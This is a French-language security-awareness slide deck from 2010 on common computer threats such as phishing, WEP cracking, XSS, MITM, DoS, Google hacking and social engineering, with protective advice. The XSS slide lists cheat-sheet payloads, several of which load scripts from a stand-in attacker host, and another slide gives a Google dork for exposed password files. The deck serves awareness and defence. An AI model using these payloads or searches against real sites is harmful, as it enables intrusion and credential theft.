RISQUES INFORMATIQUES ET MÉTHODES DE PROTECTION Charles Demers-Tremblay, CISSP, CEH, CDFT, S+ Les Technologies Wolf inc. 26-04-2010
Introduction Charles Demers Tremblay Je ne suis pas recherché par la police Hacker éthique, contre menaces Spécialités : Tests d intrusions, enquêtes électroniques
Hacking 101
Hacking 101 Motivations? Mandats, défis, «hack»tivisme, recherches, terrorisme (mafia) $$$ 3 types de hacker : White hat, gray hat, black hat Vous voulez en voir?
Pourriels (spam) et Hameçonnage (phishing) Comment se protéger : filtre anti pourriels, et anti phishing (http://www.dslreports.com/phishtrack), vigilance (ne jamais répondre)
Failles de sécurité Les failles d une composante ou d un groupe de composantes peuvent être exploitées de façon malveillante. Slammer? Exemple: (17 septembre 2007) Le courtier en ligne TD Ameritrade a reconnu vendredi qu une de ses bases de données a été piratée, et que des coordonnées concernant ses 6,3 millions de clients ont été volées. Exemple : ( 6 avril 2010) Des pirates informatiques basés en Chine ont volé des informations relatives àla sécurité nationale en Inde, ainsi que 1.500 mails provenant des bureaux du dalaï lama, et d'autres documents sensibles, ont annoncé mardi des chercheurs du "Citizen Lab" de l'université de Toronto. Comment se protéger : Mettre àjour vos équipements (WSUS), activer et vérifier les journaux de sécurité, analyse de vulnérabilités
Le WIFI (sans fil) Il y a quelques années, «craquer» des clés WEP demandait une importante puissance de calcul. Il faut balayer le réseau àla recherche de millions de paquets, ce qui prend des jours, puis traiter les données interceptées, ce qui prend aussi un temps important. Aussi, les pirates ont développés des techniques qui accélèrent le processus de manière fulgurante ; La nouvelle attaque nommée «AirePlay» casse désormais une clé WEP de 128 bits en moins de 5 minutes en utilisant des techniques publiées il y a quelques mois. Exemple: (31 mai 2007) Scandale TJX : c'était une fuite de Wi Fi. L'affaire TJX, le piratage réseau d'une chaîne de magasins qui aurait compromis près de 46 millions d'identités bancaires, aurait commencé par l attaque d un réseau sans fil qui était peu protégé. Comment se protéger : Utiliser une clé WPA2, bloquer la propagation du SSID
avancées La présence sur le WEB Le «Cross site scripting» (ou XSS) est un type de faille de sécurité des sites Web que l'on trouve typiquement dans les applications Web. Ils peuvent être utilisées par un attaquant pour faire afficher des pages web contenant du code douteux. <BODY onload!#$%&()*~+ _.,:;?@[/ \]^`=alert("xss")> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <LAYER SRC="http://hacker.com/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <STYLE>@import'http://hacker.com/xss.css';</STYLE> <META HTTP EQUIV="Link" Content=«<http://hacker.com/xss.css>; REL=stylesheet"> <XSS STYLE="behavior: url(xss.htc);"> <OBJECT classid=clsid:ae24fdae 03c6 11d1 8b76 0080c744f389 ><param name=urlvalue=javascript:alert('xss')></object <SCRPT SRC=http://hacker.com/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> Exemple: (janvier 2005) Une faille XSS exploitée sur le site myspace.com par un utilisateur
avancées Man in the middle L'attaque de l'homme du milieu (HDM) ou man in the middle attack (MITM) en cryptographie est une attaque qui a pour but d'intercepter les communications entre deux parties, sans que ni l'une ni l'autre ne puisse se douter que le canal de communication entre elles a été compromis. L'attaquant doit d'abord être capable d'observer et d'intercepter les messages d'une victime à l'autre. Exemple : Sauvetage de Ingrid Betancourt
avancées DOS et DDOS Une attaque par déni de service (denial of service attack, d'où l'abréviation DoS) est une attaque ayant pour but de rendre indisponible un service, d'empêcher les utilisateurs légitimes d'un service de l'utiliser. Il peut s'agir de : l inondation d un réseau afin d'empêcher son fonctionnement la perturbation des connexions entre deux machines, empêchant l'accès à un service particulier l'obstruction d'accès àun service àune personne en particulier L'attaque par déni de service peut ainsi bloquer un serveur de fichiers, rendre impossible l'accès àun serveur web, empêcher la distribution de courriel dans une entreprise ou rendre indisponible un site internet. Exemple: (août 2009) Le site de microblogging Twitter a été victime d une vaste attaque par déni de service distribuée (DDOS=Distributed Denial of Service Attack).
Google hacking! «Googler»vos propres sites web! Exemple de recherche sur google : confidential filetype:pdf inurl:/cgi bin/pass.txt
Social engineering (vous!) L art de profiter de la bonne volonté des autres! Faites vous confiance àvotre afficheur (callerid)?
Intrusions physiques Est ce un livreur? Non un hacker! Restez vigilant, informez vos utilisateurs que ces menaces existent.
Conclusion Le cybercrime n'est pas prêt de cesser. C'est une réalité du 21ème siècle, et la très large disponibilité d'internet ainsi que les systèmes non sécurisés qui les accompagnent, ont accru considérablement le cybercrime. Une législation suffisamment sophistiquée et des traités internationaux contre le cybercrime sur le point d'être adoptés, devraient aider le monde informatique àjouir d'un cyber espace plus sûr, et respectueux des lois.
Références www.krollontrack.com Nouvelles judiciaires www.securityfocus.com Vulnérabilités www.secunia.com Vulnérabilités johnny.ihackstuff.com Google hacking www.milw0rm.com Exploits